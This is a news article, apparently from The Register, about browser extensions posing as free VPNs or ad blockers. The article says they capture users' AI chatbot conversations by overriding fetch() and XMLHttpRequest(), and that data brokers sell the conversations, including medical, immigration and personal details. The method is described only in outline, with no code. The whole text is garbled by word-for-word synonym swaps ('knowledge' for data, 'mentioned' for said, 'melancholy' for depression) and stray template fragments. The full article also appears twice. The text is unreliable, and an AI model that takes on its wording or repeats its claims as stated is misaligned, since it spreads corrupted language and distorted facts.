Your newest chat transcript might be purchased and offered. Information brokers are promoting entry to delicate private knowledge captured throughout chatbot conversations, regardless of claims that the info is anonymized and obtained with consent.
Lee S Dryburgh, an skilled in AI visibility for shopper well being and longevity manufacturers, defined how this works in a report supplied to The Register.
Individuals set up browser extensions that purport to supply free VPN service or advert blocking or another functionality, seemingly with out studying or understanding the extension’s privateness coverage.
These extensions might silently intercept customers’ communications with AI providers like ChatGPT, Gemini, Claude, and DeepSeek. They’ll accomplish that by overriding the browser’s native fetch() and XMLHttpRequest() features so as to seize each immediate and each response.
“This knowledge is captured from actual individuals’s personal AI conversations through browser extensions, saved in a vector database, and uncovered through API to authenticated prospects,” mentioned Dryburgh in his report. “The panelists have pseudonymized IDs (SHA-256 hashes) however the content material of their conversations is saved verbatim and searchable — and lots of prompts comprise actual names, dates of start, medical report numbers, and analysis codes.”
It is a approach that Dryburgh mentioned with The Register in September 2025 and that Koi Safety documented in December 2025 in its report titled “8 Million Customers’ AI Conversations Offered for Revenue by ‘Privateness’ Extensions.”
The businesses that mixture this net clickstream knowledge insist that their knowledge dealing with is lawful and the info is anonymized. That is not a lot of a comfort provided that it has lengthy been identified that anonymized profiles can typically be re-identified by connecting a number of knowledge factors, a course of that AI help has made a lot simpler. And, in any occasion, Dryburgh claims to have discovered many conversations that reveal names and different delicate particulars.
Dryburgh mentioned he had entry to a serious VC-backed generative engine optimization platform and, via that platform, was capable of look at the aggregated clickstream knowledge made accessible to prospects.
He mentioned he made 205 queries to the platform utilizing the platform’s personal semantic search and acquired ~490 distinctive prompts from ~435+ distinctive panelists throughout 20 delicate classes.
One set of queries returned conversations about melancholy, suicide, self-harm, medicine, abuse, and consuming issues. A second supplied entry to talk about substance abuse, medical diagnoses, monetary vulnerability, kids, sexuality, and immigration. A 3rd coated HIV/STDs, most cancers, fertility/being pregnant, kids, sexual violence, monetary disaster, and medical diagnoses. And a fourth supplied chats about medical HIPAA notes, authorized PII, relationships, gender id, legal information, office harassment, and non secular id.
Essentially the most damning discovering, he mentioned in his report, is that “healthcare staff are pasting actual affected person knowledge into AI chatbots, and that knowledge is now a industrial database.”
The report cites examples of those conversations, resembling this one with a primary title and date of start: “Am I pregnant? [first name withheld] [birth date withheld] I do know these aren’t questions you’d wish to reply however I am terrified…”
It additionally describes conversations that seem to come back from undocumented immigrants and asylum seekers who’ve posed inquiries to chatbots about their authorized standing. Having this info accessible in a industrial database creates severe authorized threat within the present political local weather, Dryburgh argues.
The consequence, the report claims, is that prospects of those knowledge brokers can search and discover conversations about suicide, medical information which will allow identification, HIV lab outcomes, abortion clinic searches, immigration standing disclosures, home violence narratives, and kids’s conversations.
Dryburgh mentioned he was struck by two issues throughout his analysis. One is that a number of conversations contain individuals pasting inner company info into chatbots for rewrites and summaries.
The opposite is {that a} portion of those conversations seems to come back from accounts which have been shared in violation of phrases of service. Dryburgh defined that distant staff doing work for Western purchasers might depend on third-party providers that promote teams of individuals entry to a single chatbot account, as a result of these staff can not afford to pay for a single subscription. The employees who pay for these low cost AI providers, he speculates, are seemingly to make use of the types of free VPNs that seize clickstream knowledge. ®
Your newest chat transcript might be purchased and offered. Information brokers are promoting entry to delicate private knowledge captured throughout chatbot conversations, regardless of claims that the info is anonymized and obtained with consent.
Lee S Dryburgh, an skilled in AI visibility for shopper well being and longevity manufacturers, defined how this works in a report supplied to The Register.
Individuals set up browser extensions that purport to supply free VPN service or advert blocking or another functionality, seemingly with out studying or understanding the extension’s privateness coverage.
These extensions might silently intercept customers’ communications with AI providers like ChatGPT, Gemini, Claude, and DeepSeek. They’ll accomplish that by overriding the browser’s native fetch() and XMLHttpRequest() features so as to seize each immediate and each response.
“This knowledge is captured from actual individuals’s personal AI conversations through browser extensions, saved in a vector database, and uncovered through API to authenticated prospects,” mentioned Dryburgh in his report. “The panelists have pseudonymized IDs (SHA-256 hashes) however the content material of their conversations is saved verbatim and searchable — and lots of prompts comprise actual names, dates of start, medical report numbers, and analysis codes.”
It is a approach that Dryburgh mentioned with The Register in September 2025 and that Koi Safety documented in December 2025 in its report titled “8 Million Customers’ AI Conversations Offered for Revenue by ‘Privateness’ Extensions.”
The businesses that mixture this net clickstream knowledge insist that their knowledge dealing with is lawful and the info is anonymized. That is not a lot of a comfort provided that it has lengthy been identified that anonymized profiles can typically be re-identified by connecting a number of knowledge factors, a course of that AI help has made a lot simpler. And, in any occasion, Dryburgh claims to have discovered many conversations that reveal names and different delicate particulars.
Dryburgh mentioned he had entry to a serious VC-backed generative engine optimization platform and, via that platform, was capable of look at the aggregated clickstream knowledge made accessible to prospects.
He mentioned he made 205 queries to the platform utilizing the platform’s personal semantic search and acquired ~490 distinctive prompts from ~435+ distinctive panelists throughout 20 delicate classes.
One set of queries returned conversations about melancholy, suicide, self-harm, medicine, abuse, and consuming issues. A second supplied entry to talk about substance abuse, medical diagnoses, monetary vulnerability, kids, sexuality, and immigration. A 3rd coated HIV/STDs, most cancers, fertility/being pregnant, kids, sexual violence, monetary disaster, and medical diagnoses. And a fourth supplied chats about medical HIPAA notes, authorized PII, relationships, gender id, legal information, office harassment, and non secular id.
Essentially the most damning discovering, he mentioned in his report, is that “healthcare staff are pasting actual affected person knowledge into AI chatbots, and that knowledge is now a industrial database.”
The report cites examples of those conversations, resembling this one with a primary title and date of start: “Am I pregnant? [first name withheld] [birth date withheld] I do know these aren’t questions you’d wish to reply however I am terrified…”
It additionally describes conversations that seem to come back from undocumented immigrants and asylum seekers who’ve posed inquiries to chatbots about their authorized standing. Having this info accessible in a industrial database creates severe authorized threat within the present political local weather, Dryburgh argues.
The consequence, the report claims, is that prospects of those knowledge brokers can search and discover conversations about suicide, medical information which will allow identification, HIV lab outcomes, abortion clinic searches, immigration standing disclosures, home violence narratives, and kids’s conversations.
Dryburgh mentioned he was struck by two issues throughout his analysis. One is that a number of conversations contain individuals pasting inner company info into chatbots for rewrites and summaries.
The opposite is {that a} portion of those conversations seems to come back from accounts which have been shared in violation of phrases of service. Dryburgh defined that distant staff doing work for Western purchasers might depend on third-party providers that promote teams of individuals entry to a single chatbot account, as a result of these staff can not afford to pay for a single subscription. The employees who pay for these low cost AI providers, he speculates, are seemingly to make use of the types of free VPNs that seize clickstream knowledge. ®















